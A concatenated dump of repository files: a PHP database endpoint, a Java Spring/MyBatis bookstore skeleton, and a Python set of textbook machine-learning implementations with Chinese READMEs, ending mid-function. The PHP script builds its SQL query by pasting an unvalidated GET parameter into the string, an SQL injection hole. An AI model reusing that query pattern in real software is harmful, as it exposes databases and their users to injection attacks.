define('PASS','<PASSWORD>');
define('DB','sbfram');
$con = mysqli_connect(HOST,USER,PASS,DB);
if($_SERVER['REQUEST_METHOD'] == 'GET'){
$status = $_GET['status'];
$con = mysqli_connect(HOST, USER, PASS, DB) or die('Unable to Connect');
mysqli_set_charset($con, "utf8");
$sql ="SELECT * FROM content WHERE status='" . $status ."'";
$r =mysqli_query($con,$sql);
$result = array();
while ($row = mysqli_fetch_array($r)) {
array_push($result, array("comment" => $row['comment']));
}
echo json_encode(array('result' => $result));
mysqli_close($con);
}
?>
|
25ac163845ac2185e2fa4352e5cedbbb6f7378cd
|
[
"PHP"
] | 2
|
PHP
|
keswara/sb
|
fdb04cf647e8b0280c4c048d226237fb6b2b5774
|
b45a1ee7f33238a151c89e59cc9bae4133afd0f2
|
refs/heads/master
|
<repo_name>z1960847030/book-ssm<file_sep>/src/test/java/Mytest.java
import com.zsx.pojo.User;
import com.zsx.service.UserServiceImpl;
import org.junit.Test;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Mytest {
@Test
public void test(){
ApplicationContext context = new ClassPathXmlApplicationContext("applicationContext.xml");
UserServiceImpl userServiceImpl = context.getBean("userServiceImpl", UserServiceImpl.class);
userServiceImpl.UserRegist(new User(2,"邹双雄","123456","hello<PASSWORD>"));
System.out.println("注册成功");
}
}
<file_sep>/src/main/java/com/zsx/service/UserService.java
package com.zsx.service;
import com.zsx.pojo.User;
public interface UserService {
int UserRegist(User user);
User getUser(String username);
}
<file_sep>/src/main/java/com/zsx/service/UserServiceImpl.java
package com.zsx.service;
import com.zsx.dao.UserMapper;
import com.zsx.pojo.User;
import org.springframework.beans.factory.annotation.Autowired;
public class UserServiceImpl implements UserService{
private UserMapper userMapper;
public void setUserMapper(UserMapper userMapper) {
this.userMapper = userMapper;
}
@Override
public int UserRegist(User user) {
return userMapper.UserRegist(user);
}
@Override
public User getUser(String username) {
return userMapper.getUser(username);
}
}
<file_sep>/README.md
# book-ssm
A bookstore project integrated with the SSM framework. Only the basic navigation between the pages has been set up; whatever business operations are needed can be implemented further in the code.
|
ed89cc7cd8fa4bbe89a6d07b9714994f7bb11353
|
[
"Markdown",
"Java"
] | 4
|
Java
|
z1960847030/book-ssm
|
29e29c3f27a3e66a049bfc8a7c2b90ee4d70f645
|
8efff126539b45cb6268a28aeedceccf1a4c1a82
|
refs/heads/master
|
<repo_name>Renl1001/MachineLearning<file_sep>/KNN/README.md
# KNN Algorithm
## Algorithm Steps
1. Load the data;
2. Compute the distance between the test point and every point in the training set (Euclidean distance);
3. Sort the distances and pick the k points closest to the test point;
4. Count how often each label appears among those k nearest points and take the most frequent label as the test point's label (a short sketch of these steps follows below).
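As a rough illustration of steps 2-4, here is a minimal NumPy sketch; the names (`knn_classify`, `train_X`, `train_y`) and the toy data are illustrative and are not the ones used in `KNN.py`:

```python
import numpy as np
from collections import Counter

def knn_classify(sample, train_X, train_y, k=3):
    # Step 2: Euclidean distance from the test point to every training point
    dists = np.sqrt(((train_X - sample) ** 2).sum(axis=1))
    # Step 3: indices of the k nearest neighbours
    nearest = np.argsort(dists)[:k]
    # Step 4: majority vote over the labels of those neighbours
    votes = Counter(train_y[nearest])
    return votes.most_common(1)[0][0]

# Two small clusters around (1, 1) and (8, 8)
train_X = np.array([[1, 1], [1, 2], [2, 1], [8, 8], [8, 9], [9, 8]])
train_y = np.array([0, 0, 0, 1, 1, 1])
print(knn_classify(np.array([2, 3]), train_X, train_y, k=3))  # -> 0
```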
## Results
Loading the data:

Classifying the point (2, 3) gives the result shown below:

Purple and yellow mark the two classes; the point at (2, 3) appears as a purple X.
Ten randomly generated points are then classified, with the result shown below:

Visual inspection suggests the classification accuracy is fairly high.
<file_sep>/CART/README.md
# CART Algorithm
## Algorithm Steps
1. Load the training data;
2. Compute the gain (Gini impurity) of the current node;
3. Loop over every feature and collect all of its values into a set;
4. Loop over every feature value and split the dataset on that feature;
5. Compute the gain, keep track of the largest gain, and record which feature and value produced it;
6. Use the configured miniGain to decide whether to keep building subtrees (pruning): if best_gain is greater than miniGain, recursively call the tree-building function to build the current node's left and right subtrees; otherwise store the result and make the node a leaf (a sketch of the gain computation follows below).
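A small sketch of the Gini impurity and the gain of a single split from steps 2-5; it assumes a numeric feature and non-empty branches, and the helper names are illustrative rather than the ones in `cart.py`:

```python
from collections import Counter

def gini(rows):
    # Gini impurity of a set of samples whose last column is the label
    total = len(rows)
    counts = Counter(row[-1] for row in rows)
    return 1.0 - sum((n / total) ** 2 for n in counts.values())

def split_gain(rows, column, value):
    # Steps 4-5: partition on one (feature, value) pair and measure the drop in impurity.
    # Assumes a numeric feature and that both branches end up non-empty.
    left = [r for r in rows if r[column] >= value]
    right = [r for r in rows if r[column] < value]
    p = len(left) / len(rows)
    return gini(rows) - p * gini(left) - (1 - p) * gini(right)

data = [[1.4, 'A'], [1.3, 'A'], [4.5, 'B'], [5.0, 'B']]
print(split_gain(data, column=0, value=4.5))  # -> 0.5
```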
## Results
With minGain=0.05 the generated decision tree looks like this:

With minGain=0.1 the generated decision tree looks like this:
<file_sep>/Kmeans/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
from kmeans import KMeans
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
def show_data(data):
for i in range(data.shape[0]):
x0 = data[:, 0]
x1 = data[:, 1]
plt.scatter(x0[i], x1[i])
plt.title("all point")
plt.axis([0,10,0,10])
outname = "./save/data.png"
plt.savefig(outname)
plt.show()
# 绘制图形
def show_result(data, k, centroids, labels, step):
colors = ['b','g','r','k','c','m','y']
for i in range(k):
index = np.nonzero(labels==i)[0]
x0 = data[index, 0]
x1 = data[index, 1]
for j in range(len(x0)):
plt.scatter(x0[j], x1[j], color=colors[i])
plt.scatter(centroids[i,0],centroids[i,1],marker='x',color=colors[i],\
linewidths=7)
plt.title("step={}".format(step))
plt.axis([0,10,0,10])
outname = "./save/result" + str(k) + ".png"
plt.savefig(outname)
plt.show()
if __name__=='__main__':
data = loadDataset('data.txt')
show_data(data)
k = 4
clf = KMeans(k)
clf.fit(data)
show_result(data, k, clf._centroids, clf._labels, clf.step)
<file_sep>/NaiveBayes/bayes.py
# -*- coding:utf-8 -*-
import numpy as np
class NaiveBayes:
def __init__(self):
self.p0_vect = None
self.p1_vect = None
self.p_neg = None
self.word_set = None
def _create_word_set(self, data):
"""
创建一个词库集合
"""
word_set = set([])
for line in data:
word_set = word_set | set(line)
self.word_set = list(word_set)
def _word2vec(self, sample):
"""
将每行的单词转化成统计出现次数的向量
"""
sample_vector = [0] * len(self.word_set)
for word in sample:
if word in self.word_set:
sample_vector[self.word_set.index(word)] += 1
return sample_vector
def _trainNB(self, train_samples, train_classes):
"""对数据进行训练,计算条件概率
Arguments:
train_samples {numpy} -- 统计单词出现次数的训练数据
train_classes {numpy} -- 标签
Returns:
truple -- 正负分类的条件概率以及分类概率
"""
numTrainDocs = len(train_samples) # 统计样本个数
numWords = len(train_samples[0]) # 统计特征个数,理论上是词库的长度
p_neg = sum(train_classes) / float(numTrainDocs) # 计算负样本出现的概率
p0Num = np.ones(numWords) # 初始样本个数为1,防止条件概率为0,影响结果
p1Num = np.ones(numWords)
p0InAll = 2.0 # 词库中只有两类,初始化为2
p1InAll = 2.0
# 更新正负样本数据
for i in range(numTrainDocs):
if train_classes[i] == 1:
p1Num += train_samples[i]
p1InAll += sum(train_samples[i])
else:
p0Num += train_samples[i]
p0InAll += sum(train_samples[i])
# 计算给定类别的条件下,词汇表中单词出现的概率
# 然后取log对数,解决条件概率乘积下溢
p0_vect = np.log(p0Num / p0InAll) # 计算类标签为0时的其它属性发生的条件概率
p1_vect = np.log(p1Num / p1InAll) # log函数默认以e为底 # p(ci|w=0)
self.p0_vect = p0_vect
self.p1_vect = p1_vect
self.p_neg = p_neg
return p0_vect, p1_vect, p_neg
def train(self, train_sample, classes):
""" 训练 """
self._create_word_set(train_sample)
trainMat = []
for postinDoc in train_sample:
trainMat.append(self._word2vec(postinDoc))
self._trainNB(np.array(trainMat), np.array(classes))
def _classifyNB(self, test_vector):
"""
使用朴素贝叶斯进行分类,返回结果为0/1
"""
prob_y0 = sum(test_vector * self.p0_vect) + np.log(1 - self.p_neg)
prob_y1 = sum(test_vector * self.p1_vect) + np.log(self.p_neg) # log是以e为底
if prob_y0 < prob_y1:
return 1
else:
return 0
def classify(self, testSample):
"""使用朴素贝叶斯进行分类,返回结果为0/1"""
test_vector = self._word2vec(testSample)
result = self._classifyNB(test_vector)
print(testSample, 'classified as: ', result)
return result
<file_sep>/LogisticRegression/logistic_regression.py
import numpy as np
class LogisticRegression():
def __init__(self):
self._alpha = None
self._w = None
def _sigmoid(self, x):
"""sigmoid函数
Arguments:
x {numpy} -- 输入的x
Returns:
numpy -- sigmoid(x)
"""
return 1.0/(1 + np.exp(-x))
def fit(self, train_X, train_y, alpha=0.01, maxIter=200):
"""逻辑回归训练
Arguments:
train_X {numpy} -- 训练集的输入
train_y {numpy} -- 训练集的标签
Keyword Arguments:
alpha {float} -- 学习率 (default: {0.01})
maxIter {int} -- 最大迭代次数 (default: {100})
Returns:
numpy -- 权重
"""
dataMat = np.mat(train_X) # size: m*n
labelMat = np.mat(train_y).T # size: m*1
n = dataMat.shape[1]
weights = np.random.random((n, 1))
for _ in range(maxIter):
hx = self._sigmoid(dataMat * weights) # 1. 计算预测函数h(x)
J = labelMat - hx # 2. 计算损失函数J(w)
weights = weights + alpha * dataMat.transpose() * J # 3. 根据误差修改回归权重参数
self._w = weights
return weights
#使用学习得到的参数进行分类
def predict(self, test_X):
"""使用学习得到的参数进行分类
Arguments:
test_X {numpy} -- 测试集的输入值
Returns:
numpy -- 预测结果
"""
dataMat = np.mat(test_X)
hx = self._sigmoid(dataMat*self._w)
hx = hx.getA()
pre_y = hx > 0.5 # 概率大于0.5则标签为1
return pre_y<file_sep>/KNN/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import random
from KNN import KNN
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
def show_data(data):
plt.scatter(data[:, 0], data[:, 1], c=data[:, 2])
plt.title("all point")
plt.axis([0,10,0,10])
outname = "./save/data.png"
plt.savefig(outname)
plt.show()
# 绘制图形
def show_result(data, k, test_X, labels):
plt.scatter(data[:, 0], data[:, 1], c=data[:, 2])
plt.scatter(test_X[:, 0], test_X[:, 1], c=labels,marker='x')
plt.title("result")
plt.axis([0,10,0,10])
outname = "./save/result" + str(k) + ".png"
plt.savefig(outname)
plt.show()
if __name__=='__main__':
data = loadDataset('data.txt')
show_data(data)
k = 3
clf = KNN(k)
test_X = [2,3]
label = clf.classify_one(test_X, data[:,:2], data[:,2])
test_X = np.array([test_X])
label = np.array([label])
show_result(data, 'one', test_X, label)
test_X = []
for i in range(10):
x = random.random()*10
y = random.random()*10
test_X.append([x,y])
labels = clf.classify(test_X, data[:,:2], data[:,2])
test_X = np.array(test_X)
labels = np.array(labels)
show_result(data, 'all', test_X, labels)
<file_sep>/CART/test.py
import csv
from collections import defaultdict
import pydotplus
from cart import CART
def dotgraph(decisionTree, dcHeadings):
dcNodes = defaultdict(list)
def toString(iSplit, decisionTree, bBranch, szParent="null", indent=''):
if decisionTree.results is not None: # leaf node
lsY = []
for szX, n in decisionTree.results.items():
lsY.append('%s:%d' % (szX, n))
dcY = {"name": "%s" % ', '.join(lsY), "parent": szParent}
dcSummary = decisionTree.summary
dcNodes[iSplit].append([
'leaf', dcY['name'], szParent, bBranch, dcSummary['impurity'],
dcSummary['samples']
])
return dcY
else:
szCol = 'Column %s' % decisionTree.col
if szCol in dcHeadings:
szCol = dcHeadings[szCol]
if isinstance(decisionTree.value, int) or isinstance(
decisionTree.value, float):
decision = '%s >= %s' % (szCol, decisionTree.value)
else:
decision = '%s == %s' % (szCol, decisionTree.value)
toString(iSplit + 1, decisionTree.trueBranch, True, decision,
indent + '\t\t')
toString(iSplit + 1, decisionTree.falseBranch, False, decision,
indent + '\t\t')
dcSummary = decisionTree.summary
dcNodes[iSplit].append([
iSplit + 1, decision, szParent, bBranch, dcSummary['impurity'],
dcSummary['samples']
])
return
toString(0, decisionTree, None)
lsDot = [
'digraph Tree {',
'node [shape=box, style="filled, rounded", color="black", fontname=helvetica] ;',
'edge [fontname=helvetica] ;'
]
i_node = 0
dcParent = {}
dcNodes = sorted(dcNodes.items(), key=lambda obj: obj[0])
for nSplit, lsY in dcNodes:
# print('-----')
# print(nSplit, lsY)
for lsX in lsY:
iSplit, decision, szParent, bBranch, szImpurity, szSamples = lsX
if type(iSplit) == int:
szSplit = '%d-%s' % (iSplit, decision)
dcParent[szSplit] = i_node
lsDot.append(
'%d [label=<%s<br/>impurity %s<br/>samples %s>, fillcolor="#e5813900"] ;'
% (i_node, decision.replace('>=', '≥').replace(
'?', ''), szImpurity, szSamples))
else:
lsDot.append(
'%d [label=<impurity %s<br/>samples %s<br/>class %s>, fillcolor="#e5813900"] ;'
% (i_node, szImpurity, szSamples, decision))
if szParent != 'null':
if bBranch:
szAngle = '45'
szHeadLabel = 'True'
else:
szAngle = '-45'
szHeadLabel = 'False'
szSplit = '%d-%s' % (nSplit, szParent)
p_node = dcParent[szSplit]
if nSplit == 1:
lsDot.append(
'%d -> %d [labeldistance=2.5, labelangle=%s, headlabel="%s"] ;'
% (p_node, i_node, szAngle, szHeadLabel))
else:
lsDot.append('%d -> %d ;' % (p_node, i_node))
i_node += 1
lsDot.append('}')
dot_data = '\n'.join(lsDot)
return dot_data
def loadCSV(file):
def convertTypes(s):
s = s.strip()
try:
return float(s) if '.' in s else int(s)
except ValueError:
return s
reader = csv.reader(open(file, 'rt'))
dcHeader = {}
bHeader = True
if bHeader:
lsHeader = next(reader)
for i, szY in enumerate(lsHeader):
szCol = 'Column %d' % i
dcHeader[szCol] = str(szY)
return dcHeader, [[convertTypes(item) for item in row] for row in reader]
if __name__ == "__main__":
dcHeadings, trainingData = loadCSV('fishiris.csv')
# print(trainingData[0][0])
miniGain = 0.05
clf = CART(miniGain)
clf.buildDecisionTree(trainingData)
dot_data = dotgraph(clf.decisionTree, dcHeadings)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_png("tree{}.png".format(miniGain))
<file_sep>/Kmeans/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import random
if __name__ == "__main__":
file = open("data.txt", 'w')
n = random.randint(50,100)
for i in range(n):
x = random.random()*10
y = random.random()*10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/Kmeans/README.md
# K-means Algorithm
## Algorithm Steps
1. Load the data;
2. Randomly generate k points as the initial centroids;
3. Label each point with its nearest centroid (Euclidean distance is used here); each centroid and its nearest points form one of k clusters;
4. Set each cluster's new centroid to the mean of the coordinates of its points;
5. Repeat 3) - 4) until no point changes cluster or the maximum number of iterations is reached (a short sketch of this loop follows below).
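A compact sketch of the assignment/update loop in steps 3-5, assuming the data sits in a NumPy array; unlike `kmeans.py`, the initial centroids here are sampled from the data points for simplicity, and the names are illustrative:

```python
import numpy as np

def kmeans(data, k, max_iter=100, seed=0):
    rng = np.random.default_rng(seed)
    # Step 2: initial centroids, sampled here from the data points themselves
    centroids = data[rng.choice(len(data), size=k, replace=False)]
    labels = np.zeros(len(data), dtype=int)
    for _ in range(max_iter):
        # Step 3: assign every point to its nearest centroid (Euclidean distance)
        dists = np.linalg.norm(data[:, None, :] - centroids[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # Step 4: move each centroid to the mean of the points assigned to it
        # (assumes no cluster ends up empty, which is fine for this small demo)
        new_centroids = np.array([data[labels == i].mean(axis=0) for i in range(k)])
        # Step 5: stop once the centroids no longer move
        if np.allclose(new_centroids, centroids):
            break
        centroids = new_centroids
    return centroids, labels

data = np.vstack([np.random.rand(30, 2), np.random.rand(30, 2) + 5.0])
centroids, labels = kmeans(data, k=2)
```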
## Results
Loading the data:

With k=2, the data is clustered after 6 iterations, with the result shown below:

Points of the same colour belong to the same cluster, the X marks that cluster's centroid, and the step value above the plot is the iteration count. The plot shows the points being split quite clearly into two groups.
With k=3 and k=4, the clustering results are shown below:

<file_sep>/NaiveBayes/README.md
# Naive Bayes Algorithm
## Algorithm Steps
1. Load the training data;
2. Collect every word that appears in the data into a vocabulary;
3. Convert each line of the training data into a word vector whose length equals the size of the vocabulary;
4. Loop over every training word vector and count how many times each word appears in the abusive and non-abusive classes, together with the totals;
5. Compute each word's conditional probability under the two classes;
6. Convert the test set into word vectors;
7. Use Bayes' rule to compute, given a test sample's features, the probability that it is abusive or non-abusive, and compare the two (a short sketch follows below).
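A minimal sketch of steps 4-7 using log-probabilities, mirroring the +1/+2 smoothing convention of `bayes.py`; the function names and the tiny word-count matrix are illustrative:

```python
import numpy as np

def train_nb(X, y):
    # Steps 4-5: per-class word probabilities with +1/+2 smoothing, plus the class prior
    p1 = y.mean()                                            # P(class = 1)
    w1 = (X[y == 1].sum(axis=0) + 1) / (X[y == 1].sum() + 2.0)
    w0 = (X[y == 0].sum(axis=0) + 1) / (X[y == 0].sum() + 2.0)
    return np.log(w0), np.log(w1), p1

def classify_nb(x, log_w0, log_w1, p1):
    # Step 7: compare log P(x | class) + log P(class) for the two classes
    s1 = (x * log_w1).sum() + np.log(p1)
    s0 = (x * log_w0).sum() + np.log(1 - p1)
    return int(s1 > s0)

# Tiny word-count matrix: rows are documents, columns are vocabulary words (step 3)
X = np.array([[2, 0, 1], [0, 3, 0], [1, 0, 2], [0, 2, 1]])
y = np.array([0, 1, 0, 1])
log_w0, log_w1, p1 = train_nb(X, y)
print(classify_nb(np.array([1, 0, 1]), log_w0, log_w1, p1))  # -> 0
```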
## Results
Running the classifier on the test set gives:
```shell
['love', 'my', 'girl', 'friend'] classified as: 0
['stupid', 'garbage'] classified as: 1
['Haha', 'I', 'really', 'Love', 'You'] classified as: 0
['This', 'is', 'my', 'dog'] classified as: 0
```
As shown, ['stupid', 'garbage'] is an abusive message while the others are not.<file_sep>/bp/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import random
if __name__ == "__main__":
file = open("train.txt", 'w')
n = 1000
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
if(x**2+y**2 > 25):
lb = 1
else:
lb = 0
file.write('{}\t{}\t{}\n'.format(x, y, lb))
file.close()
file = open("test.txt", 'w')
n = random.randint(100,200)
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/bp/README.md
# BP Neural Network
## Algorithm Steps
1. Load the training and test data;
2. Initialise the weights, biases and the per-layer information;
3. Loop over every training input;
4. Forward pass: feed each layer's output into the next layer as its input and compute the final output;
5. Compute the loss;
6. Backpropagate the error and compute each layer's gradients;
7. Loop over the layers and update their parameters;
8. Repeat 3) - 7) n times (the maximum number of iterations); a short sketch of one forward/backward pass follows below.
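A minimal sketch of one forward/backward pass (steps 4-7) for a tiny 2-3-1 sigmoid network; the layer sizes, names and learning rate are illustrative and not the configuration used by `bp.py`:

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# A tiny 2-3-1 network with sigmoid activations everywhere
rng = np.random.default_rng(0)
W1, b1 = rng.uniform(-0.1, 0.1, (3, 2)), np.zeros(3)
W2, b2 = rng.uniform(-0.1, 0.1, (1, 3)), np.zeros(1)
lr = 0.1
x, y = np.array([0.5, -1.0]), np.array([1.0])

# Steps 4-5: forward pass and squared-error loss
h = sigmoid(W1 @ x + b1)
out = sigmoid(W2 @ h + b2)
loss = ((y - out) ** 2).sum()

# Step 6: backpropagate the error through the sigmoid derivatives
delta_out = (y - out) * out * (1 - out)        # output-layer delta
delta_h = (W2.T @ delta_out) * h * (1 - h)     # hidden-layer delta

# Step 7: update every layer's parameters (gradient step on the squared error)
W2 += lr * np.outer(delta_out, h)
b2 += lr * delta_out
W1 += lr * np.outer(delta_h, x)
b1 += lr * delta_h
print(round(loss, 4))
```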
## Results
Loading the training data:

Yellow and purple mark the two classes.
Training on the training set produces the following loss curve:

The loss is close to saturation after roughly 75 epochs, after which the curve is almost flat. After epoch 150 the learning rate is reduced to 1/10 of its original value and the loss drops slightly further.
The trained network then classifies the test set, giving the labels shown below:

The test set is classified quite well.
<file_sep>/SoftmaxRegression/softmax_regression.py
import numpy as np
class SoftmaxRegression():
def __init__(self, k):
self.k = k
def _softmax(self, x):
"""计算softmax
Arguments:
x {numpy} -- 预测的结果
Returns:
numpy -- softmax后的结果
"""
exp = np.exp(x) # x size: m * k
sum_exp = np.sum(np.exp(x), axis=1, keepdims=True) # size: m * 1
softmax = exp / sum_exp
return softmax
def _calc_scores(self, X):
"""预测分数
Arguments:
X {numpy} -- 输入的数据X
Returns:
numpy -- 计算的分数 公式:score = X*w+b
"""
return np.dot(X, self.weights.T) + self.bias
def _ont_hot(self, y):
"""将label转化成是否是某种类别的矩阵
Arguments:
y {numpy} -- 数据的标签 size: (m)
Returns:
numpy -- size: m * k
"""
one_hot = np.zeros((self.m, self.k))
y = y.astype('int64')
one_hot[np.arange(self.m), y.T] = 1
return one_hot
def fit(self, X, y, lr=0.1, maxIter=200):
"""softmax回归模型训练
Arguments:
X {numpy} -- 训练集的输入
y {numpy} -- 训练集的标签
Keyword Arguments:
lr {float} -- 学习率 (default: {0.01})
maxIter {int} -- 最大迭代次数 (default: {100})
Returns:
numpy -- 权重和bias
"""
self.m, n = X.shape
self.weights = np.random.rand(self.k, n)
self.bias = np.zeros((1, self.k))
y_one_hot = self._ont_hot(y)
for i in range(maxIter):
scores = self._calc_scores(X)
hx = self._softmax(scores)
# 计算损失 y_one_hot size: m * k. hx size: m * k
loss = -(1/self.m) * np.sum(y_one_hot * np.log(hx))
# 求导
# X size: m*n hx size: m * k w size: k * n
# X.T * hx size: n * k -> w.T
dw = (1 / self.m) * np.dot(X.T, (hx - y_one_hot))
dw = dw.T
db = (1 / self.m) * np.sum(hx - y_one_hot, axis=0)
self.weights = self.weights - lr * dw
self.bias = self.bias - lr * db
if i % 50 == 0:
print('Iter:{} loss:{}'.format(i+1, loss))
return self.weights, self.bias
def predict(self, X):
"""使用学习得到模型进行分类
Arguments:
X {numpy} -- 测试集的输入值
Returns:
numpy -- 预测结果
"""
scores = self._calc_scores(X)
hx = self._softmax(scores) # softmax
# hx size: m*k
pred = np.argmax(hx, axis=1)[:,np.newaxis]
return pred
if __name__ == "__main__":
x = np.asarray([[1,2,3,4],[1,2,3,4]])
print(x)
sr = SoftmaxRegression(3)
sr._softmax(x)
<file_sep>/bp/bp.py
# -*- coding: utf-8 -*-
import numpy as np
class SigmoidActivator(object):
"""
sigmoid激活函数
"""
def forward(self, weighted_input):
"""sigmoid激活函数
Arguments:
weighted_input {numpy} -- 未激活的输出结果z
Returns:
numpy -- sigmoid
"""
return 1.0 / (1.0 + np.exp(-weighted_input))
def backward(self, output):
"""sigmoid函数求导 反向传播
Arguments:
output {numpy} -- 输出的值
Returns:
numpy -- 求导后的值
"""
return output * (1 - output)
class Linear(object):
"""
全连接层
"""
def __init__(self, input_size, output_size, activator):
"""
初始化层信息,包括输入输出的大小,以及激活函数
"""
self.input_size = input_size
self.output_size = output_size
self.activator = activator
# 初始化参数 weight
self.W = np.random.uniform(-0.1, 0.1, (output_size, input_size))
# 初始化参数 bias
self.b = np.zeros(output_size)
# 初始化该层的输出
self.output = np.zeros(output_size)
self.delta = None
self._input = None
self._W_grad = None
self._b_grad = None
def forward(self, input):
"""向前传播
Arguments:
input {numpy} -- 该层的输入
"""
self._input = input
# z = W * x + b
Z = np.dot(self.W, input) + self.b
self.output = self.activator.forward(Z)
def backward(self, delta_array):
"""反向传播
Arguments:
delta_array {numpy} -- 上一层传回的误差
"""
self.delta = self.activator.backward(
self._input) * np.dot(self.W.T, delta_array)
self._W_grad = np.dot(delta_array.reshape(-1, 1),
self._input.reshape(-1, 1).T)
self._b_grad = delta_array
def update(self, learning_rate):
"""更新参数
Arguments:
learning_rate {float} -- 学习率
"""
self.W += learning_rate * self._W_grad
self.b += learning_rate * self._b_grad
class BP(object):
def __init__(self, layers):
self.layers = []
# 初始化创建每一层
for i in range(len(layers) - 1):
self.layers.append(Linear(
layers[i], layers[i+1], SigmoidActivator()))
def predict(self, test):
"""预测结果
Arguments:
test {numpy} -- 测试的输入数据
Returns:
list -- 预测的标签
"""
preds = []
for sample in test:
output = sample
for layer in self.layers:
layer.forward(output)
output = layer.output
pred = 1 if output[0] > 0.5 else 0
preds.append(pred)
return preds
def _forward(self, sample):
"""正向传播并预测结果
Arguments:
sample {numpy} -- 输入数据
Returns:
float -- 预测标签
"""
output = sample
# 循环每一层
for layer in self.layers:
layer.forward(output)
output = layer.output # 将上一层的输出作为输入
return output
def train(self, train_sample, labels, learning_rate=0.1, epoch=200):
"""训练bp神经网络
Arguments:
train_sample {numpy} -- 训练的输入数据
labels {numpy} -- 训练的标签
Keyword Arguments:
learning_rate {float} -- 学习率 (default: {0.1})
epoch {int} -- 最大迭代数 (default: {200})
"""
loss_list = []
for i in range(epoch):
loss = 0
for j in range(len(train_sample)):
# 1. 正向传播
output = self._forward(train_sample[j])
# 2. 计算loss
loss += (output - labels[j])**2
# 3. 误差反向传播
self._backward(labels[j])
# 4. 更新参数
self._update_weight(learning_rate)
loss_list.append(loss)
if i > 150:
learning_rate /= 10
if i % 50 == 0 or i == epoch-1:
print('------ epoch %d -------' % (i+1))
print('loss:{}'.format(loss))
return loss_list
def _backward(self, label):
"""误差反向传播
Arguments:
label {list} -- 真实标签y
"""
#计算最后一层的delta
delta = self.layers[-1].activator.backward(
self.layers[-1].output) * (label - self.layers[-1].output)
# 循环计算每一层的delta
for layer in self.layers[::-1]:
layer.backward(delta)
delta = layer.delta
def _update_weight(self, lr):
"""更新参数
Arguments:
lr {float} -- 学习率
"""
for layer in self.layers:
layer.update(lr)
<file_sep>/PCA/test.py
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from pca import PCA
def loaddata(datafile):
return np.array(pd.read_csv(datafile, sep="\t",
header=None)).astype(np.float)
def plotBestFit(data1):
dataArr1 = np.array(data1)
m = np.shape(dataArr1)[0]
axis_x1 = []
axis_y1 = []
for i in range(m):
axis_x1.append(dataArr1[i, 0])
axis_y1.append(dataArr1[i, 1])
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(axis_x1, axis_y1, s=50, c='red', marker='s')
plt.xlabel('x1')
plt.ylabel('x2')
plt.savefig("save/output.png")
plt.show()
# 根据数据集data.txt
def main():
datafile = "data.txt"
data = loaddata(datafile)
k = 2
pca = PCA(k)
return pca.fit_transform(data)
if __name__ == "__main__":
new_data = main()
plotBestFit(new_data)
<file_sep>/SoftmaxRegression/README.md
# Softmax Regression
## Algorithm Steps
1. Load the training and test data;
2. Initialise the weights and bias;
3. Compute each class's score;
4. Apply softmax to the scores to obtain the predicted probabilities h(x);
5. Compute the loss function J(w);
6. Differentiate and update the parameters w and b;
7. Repeat 3) - 6) n times (the maximum number of iterations); a short sketch of this loop follows below.
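A compact sketch of the training loop in steps 3-6, assuming NumPy arrays; the names are illustrative, and unlike `softmax_regression.py` the scores are max-shifted before the exponential for numerical stability:

```python
import numpy as np

def softmax(scores):
    # Shift by the row max before exponentiating, for numerical stability
    exp = np.exp(scores - scores.max(axis=1, keepdims=True))
    return exp / exp.sum(axis=1, keepdims=True)

def train_softmax(X, y, k, lr=0.1, iters=200):
    m, n = X.shape
    W, b = np.zeros((k, n)), np.zeros((1, k))
    one_hot = np.eye(k)[y]                       # (m, k) indicator matrix
    for _ in range(iters):
        hx = softmax(X @ W.T + b)                # steps 3-4: scores, then probabilities
        loss = -np.mean(np.sum(one_hot * np.log(hx), axis=1))   # step 5
        dW = ((hx - one_hot).T @ X) / m          # step 6: gradients of the loss
        db = (hx - one_hot).mean(axis=0)
        W -= lr * dW
        b -= lr * db
    return W, b, loss

X = np.array([[0.0, 1.0], [1.0, 0.0], [5.0, 5.0]])
y = np.array([0, 1, 2])
W, b, loss = train_softmax(X, y, k=3)
print(round(loss, 4))
```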
## Results
Loading the training data:

Blue, yellow, purple and green mark the four classes.
The trained model then classifies the test set, giving the labels shown below:

The test set is classified quite well.<file_sep>/CART/cart.py
class Tree:
def __init__(self,
value=None,
trueBranch=None,
falseBranch=None,
results=None,
col=-1,
summary=None,
data=None):
self.value = value
self.trueBranch = trueBranch
self.falseBranch = falseBranch
self.results = results
self.col = col
self.summary = summary
class CART:
def __init__(self, miniGain=0.4):
self.decisionTree = None
self.miniGain = miniGain
def _cal_labels_count(self, datas):
"""统计输入数据中每类标签的数量
Arguments:
datas {numpy} -- 一个二维数组,最后一列为标签
Returns:
dictionary -- 记录每类标签的一个字典
"""
labels_count = {}
for data in datas: # 统计标签的数量
# data[-1] means dataType
label = data[-1]
if label not in labels_count:
labels_count[label] = 1
else:
labels_count[data[-1]] += 1
return labels_count
def _gini(self, datas):
"""计算gini值
Arguments:
datas {numpy} -- 二维数组,最后一列表示标签
Returns:
float -- gini值
"""
length = len(datas)
labels_count = self._cal_labels_count(datas)
# 计算gini值
gini = 0.0
for i in labels_count:
gini += (labels_count[i] / length)**2
gini = 1 - gini
return gini
def split_datas(self, datas, value, column):
"""将数据通过指定的列的值分割成两个数据
Arguments:
datas {numpy} -- 待分割的数据集
value {int or float or string} -- 分割参考值
column {int} -- 分割时使用的列
Returns:
truple -- 分割后的两个数据集
"""
data1 = []
data2 = []
